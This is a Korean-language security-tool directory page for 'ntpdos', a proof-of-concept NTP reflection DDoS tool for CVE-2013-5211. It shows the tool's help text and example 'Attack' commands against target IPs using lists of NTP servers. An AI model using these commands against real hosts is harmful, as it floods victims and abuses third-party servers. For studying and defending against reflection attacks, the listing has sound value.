Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ntpdos — 분산 NTP 반사 DoS를 위한 PoC (CVE-2013-5211) | Kitploit
도구/GitHubGitHub/sepehrdaddev/ntpdos
Vulnerability AnalysisExploitationNetwork SecurityLearning & Education
GitHubsepehrdaddev/ntpdos

ntpdos

분산 NTP 반사 DoS를 위한 PoC (CVE-2013-5211)

저장소 보기
10126년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ntpdos

분산 NTP 반사 DoS (CVE-2013-5211)에 대한 PoC.

Usage

root@kitploit:~
$ ./ntpdos -H
--==[ ntpdos by sepehrdad ]==--

usage:

  ntpdos -t <addr> -s <addr> [options] | [misc]

options:

  -t <addr>    - target ip address
  -T <file>    - list of target ip addresses
  -s <addr>    - ntp server ip address
  -S <file>    - list of ntp server ip addresses
  -p <num>     - number of parallel processes (default: 80)
  -d <num>     - delay in microsecs (default: 1000)

misc:

  -V           - show version
  -H           - show help

example:

  # Attack 127.0.0.1 with servers from servers.lst
  $ ntpdos -t 127.0.0.1 -S servers.lst

  # Attack targets from targets.lst with 192.168.2.11 server
  $ ntpdos -T targets.lst -s 192.168.2.11

  # Attack targets from targets.lst with servers from servers.lst
  $ ntpdos -T targets.lst -S servers.lst

  # Attack 1.2.3.4 with 5.6.7.8 using 200 parallel processes
  $ ntpdos -t 1.2.3.4 -s 5.6.7.8 -p 200

  # Attack 1.2.3.4 with 5.6.7.8 with 1 microsec delay
  $ ntpdos -t 1.2.3.4 -s 5.6.7.8 -d 1

notes:

  * list of ip addresses should have 1 ip address per line

라이선스

이 소프트웨어는 GNU General Public License 버전 3 (GPLv3)에 따라 배포됩니다.

법적 고지

이 소프트웨어는 교육용으로만 제공됩니다! 불법 활동에 연루될 경우 저자는 어떠한 책임도 지지 않습니다. 이 소프트웨어를 사용함으로써 귀하는 이 약관에 동의하는 것입니다.

참여하기

풀 리퀘스트를 보내주세요!

도구 다운로드